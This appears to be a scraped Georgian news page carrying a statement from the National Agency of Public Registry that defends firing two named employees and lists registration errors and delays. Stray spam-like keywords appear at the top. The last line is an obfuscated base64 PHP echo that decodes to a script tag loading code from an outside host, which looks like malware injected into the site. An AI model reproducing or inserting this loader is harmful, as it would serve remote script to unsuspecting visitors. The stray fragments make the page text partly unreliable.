celsiusi
ავერსი შნაიდერი

 საქართველოს იუსტიციის სამინისტროს საჯარო რეესტრის ეროვნული სააგენტო განცხადებას ავრცელებს, სადაც აღნიშნულია, რომ ორგანიზაციის ყოფილი თანამშრომლებისა და ერთ-ერთი ტელეკომპანიის მიერ ცრუ ინფორმაცია გავრცელდა.

სააგენტო განმარტავს, რომ მარიტა ჩხიკვაძესა და ნონა ნინიაშვილთან შრომის ხელშეკრულებები შეწყდა კანონის მოთხოვნათა სრული დაცვით, მათი მხრიდან კანონმდებლობისა და ორგანიზაციის შინაგანაწესის უხეში და მრავალჯერადი დარღვევების გამო.

„შრომის ხელშეკრულებების შეწყვეტას საფუძვლად დაედო მათი მხრიდან არაერთი უკანონო და დაუსაბუთებელი გადაწყვეტილების მიღება, რომლებმაც არსებითად შელახა მოქალაქეთა კონსტიტუციით დაცული და გარანტირებული საკუთრების უფლება და კანონიერი ინტერესები.

მოქალაქეთა განცხადებებისა და საჩივრების საფუძველზე დადგინდა კანონმდებლობის დარღვევის არაერთი ფაქტი:

მყიდველის საკუთრების უფლება მის მიერ შეძენილი 21 კვ.მ ავტოფარეხის ნაცვლად დარეგისტრირდა გამყიდველის მთელ ქონებაზე (10 196 კვ.მ შენობა-ნაგებობაზე);

სამ საქმეზე საკუთრების უფლება დაურეგისტრირდა არა შემძენს, არამედ სხვა პირებს, რომლებსაც საერთოდ არ ჰქონდათ სამართლებრივი კავშირი უძრავ ქონებებთან;

უძრავ ნივთზე, ორი თანამესაკუთრის ნაცვლად, საკუთრების უფლება დაურეგისტრირდა მხოლოდ ერთ პირს;

მიუხედავად იმისა, რომ გამყიდველმა გაასხვისა უძრავი ქონების მხოლოდ ნაწილი, შემძენს საკუთრების უფლება დაურეგისტრირდა მთლიან უძრავ ნივთზე;

უძრავ ნივთზე იპოთეკის უფლება დარეგისტრირდა შესაბამისი დოკუმენტაციის და სამართლებრივი საფუძვლის გარეშე.

49 შემთხვევაში გამოვლინდა საქმის განხილვისა და გადაწყვეტისთვის აუცილებელი დოკუმენტაციის გამოთხოვის, ზეპირი მოსმენის ჩატარებისა და გადაწყვეტილების მიღებისთვის კანონმდებლობით დადგენილი ვადების დარღვევა, გადაწყვეტილებების მიღება არსებითი მნიშვნელობის მქონე გარემოებების გამოკვლევის გარეშე, რამაც უსაფუძვლოდ გააჭიანურა საქმეების განხილვა და დააზიანა მოქალაქეთა კანონიერი ინტერესები. მათ შორის, გამოვლინდა შემთხვევა, როდესაც თანამშრომელმა ჩანიშნა ზეპირი მოსმენა, რომელზეც მოქალაქეები გამოცხადდნენ დათქმულ დროს, ხოლო თავად კი არასაპატიო მიზეზით არ გამოცხადებულა სამსახურში.

გამოვლინდა სამსახურში არასაპატიო მიზეზით, რეგულარული და მიზანმიმართული დაგვიანების 32 შემთხვევა.

საჯარო რეესტრი ინდივიდუალურად მუშაობდა დასაქმებულებთან, რომ მათ მომავალში აღარ დაერღვიათ კანონმდებლობის მოთხოვნები და კეთილსინდისიერად, შესაბამისი სტანდარტებით შეესრულებინათ სამუშაო. თანამდებობიდან გათავისუფლებამდე თანამშრომლებს შეფარდებული ჰქონდათ დისციპლინური პასუხისმგელობის ზომაც, სამომავლო დარღვევების პრევენციის მიზნით.

საჯარო რეესტრისთვის, როგორც სამოქალაქო ბრუნვის გარანტისთვის, უმნიშვნელოვანესია საკუთრების უფლების დაცვა და მომსახურების დროული და ხარისხიანი მიწოდება. ყოფილი თანამშრომლების ქმედებები ზიანს აყენებდა მოქალაქეთა კანონიერ ინტერესებსა და საჯარო რეესტრის სანდოობას. ვინაიდან მათი მხრიდან კანონმდებლობის დარღვევა იყო მიზანმიმართული, განგრძობადი და განმეორებადი და ისინი არ ცვლიდნენ დამოკიდებულებას საქმის მიმართ, შეწყდა მათთან დადებული შრომითი ხელშეკრულებები“, – აღნიშნულია საჯარო რეესტრის ეროვნული სააგენტოს განცხადებაში.

104
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");